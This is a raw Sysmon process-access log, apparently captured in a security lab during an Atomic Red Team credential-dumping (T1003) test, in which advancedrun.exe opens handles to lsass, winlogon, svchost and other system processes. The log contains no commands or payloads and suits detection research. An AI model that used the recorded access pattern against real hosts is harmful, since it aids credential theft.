17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\a